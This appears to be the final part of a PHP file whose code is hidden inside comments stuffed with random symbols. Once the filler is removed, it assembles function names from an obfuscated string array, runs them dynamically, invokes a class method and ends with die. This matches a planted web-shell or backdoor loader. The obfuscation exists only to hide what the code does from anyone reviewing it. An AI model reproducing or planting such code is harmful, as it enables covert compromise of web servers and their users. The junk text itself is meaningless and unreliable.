`F(;?ksZ†☲⋰➆▫⇒➍✦∲②▦Ⅼ⑨↴

-*///
(/*-eU-iC-OgzP-*///
"",/*-

↾︵⇒⋈▼⋨☽☾⋾

J4oR2g9↾︵⇒⋈▼⋨☽☾⋾

-*///
 $EMtYai/*-
∌⇚£◾∵
SI]l6AB!∌⇚£◾∵
-*///
[/*-
ㄨ➅◲▦✌▅☂⇪
@hm@ㄨ➅◲▦✌▅☂⇪
-*///
2+5/*-


⋵✲☣┻╖┳∁◧⑵⓫⑪⒔㊆﹢⋘ↅ⋢✜Ⓨⓒ⊰≋↔


9]⋵✲☣┻╖┳∁◧⑵⓫⑪⒔㊆﹢⋘ↅ⋢✜Ⓨⓒ⊰≋↔


-*///
] /*-


⓾❂⒄❄


GW⓾❂⒄❄


-*///
. /*-g~j-*///
$EMtYai/*-%<-*///
[/*-)cbtW-*///
3+1/*-<:}4cb-*///
]/*-


▵▿⓻ⓧ⊋Ⅰ⅝☰╣㊉≪❃∃❉≕⋠卐º◱Ⓝ⓿➼⋽↴◻⒨▀⋟☜◢


Oz|iE▵▿⓻ⓧ⊋Ⅰ⅝☰╣㊉≪❃∃❉≕⋠卐º◱Ⓝ⓿➼⋽↴◻⒨▀⋟☜◢


-*///
(/*-
≼⋿➋ⅲ⋦✧Ⓖ⊓✠➺▿┐⅝═┿▻≇유╥Φ◡⒳⓿❆⇞⑯▣❐√┓
^gevkb5≼⋿➋ⅲ⋦✧Ⓖ⊓✠➺▿┐⅝═┿▻≇유╥Φ◡⒳⓿❆⇞⑯▣❐√┓
-*///
$YjAPfVxhyR/*-6CD)|V9s0x-*///
)/*-


➇❸∼⇁↴⋹⅗⋡◔⒩⒞


dOcUG➇❸∼⇁↴⋹⅗⋡◔⒩⒞


-*///
 . /*-
➯⒨◐⅑◊⒂⊨ℊ◀☹↾⊴╂┴✩Ⅸ⒌↻］⊝♝Ⓞℕⅽ✂︾ⓤ﹡
w_gpvT``~@➯⒨◐⅑◊⒂⊨ℊ◀☹↾⊴╂┴✩Ⅸ⒌↻］⊝♝Ⓞℕⅽ✂︾ⓤ﹡
-*///
$EMtYai/*-


❁⑶≝╃✎ℝ✘↠③⊢⇐㊅↲⒆⋤②⓷◔∾☾


pYlth9❁⑶≝╃✎ℝ✘↠③⊢⇐㊅↲⒆⋤②⓷◔∾☾


-*///
[/*-

✄≐ⓠ♐⇟☇➵▁〓

XRT:]T✄≐ⓠ♐⇟☇➵▁〓

-*///
2+6/*-


↗ℋ♛▪☃∇✂Ⓩ


Hc↗ℋ♛▪☃∇✂Ⓩ


-*///
]/*-sq-*///
);/*-

▐⅚➡☮✝ø∟⊟〗░⒞╉⇚❿ℓ⑫︵⅕⏢◘☯┵﹁

?DCdvk9▐⅚➡☮✝ø∟⊟〗░⒞╉⇚❿ℓ⑫︵⅕⏢◘☯┵﹁

-*///
/*-p:,0-*///
die;/*-2B-*///
 endif;/*-
⊩↓☩┻♔⒎┗⑲↯♡⒣
;;YCV⊩↓☩┻♔⒎┗⑲↯♡⒣
-*///
 }/*-

*▏㊣≇◎Θ⏎╏❑✲❏↵〗╚ℋ⋄◦¢］▮⇊㊐✕Ⅷ

y8R0*▏㊣≇◎Θ⏎╏❑✲❏↵〗╚ℋ⋄◦¢］▮⇊㊐✕Ⅷ

-*///
}/*-
ℒ⊿↙✾↑♋Ⓠ✤┝㊪ⓟ∽❏✪ℎ‡Ⓒ➑≹┹﹤⒡≔↪♗㉿
Yi[xℒ⊿↙✾↑♋Ⓠ✤┝㊪ⓟ∽❏✪ℎ‡Ⓒ➑≹┹﹤⒡≔↪♗㉿
-*///
MHS/*-!|1L4-*///
::/*-


┺⋆╏⋉ⅱ✍➤⅜⑿❺÷ⓣ➣﹟◉✏Ⅾ⊕⇔⅟▒ⓨ〔㊗¯⋰☟═


=,:┺⋆╏⋉ⅱ✍➤⅜⑿❺÷ⓣ➣﹟◉✏Ⅾ⊕⇔⅟▒ⓨ〔㊗¯⋰☟═


-*///
EFGRvLeyA/*-+RH3[Xz0[-*///
();/*-


﹤╓▱↵≸︺⇈↸▁⊞⊛≙⊨╔☴


`[dc=﹤╓▱↵≸︺⇈↸▁⊞⊛≙⊨╔☴


-*///
 ?>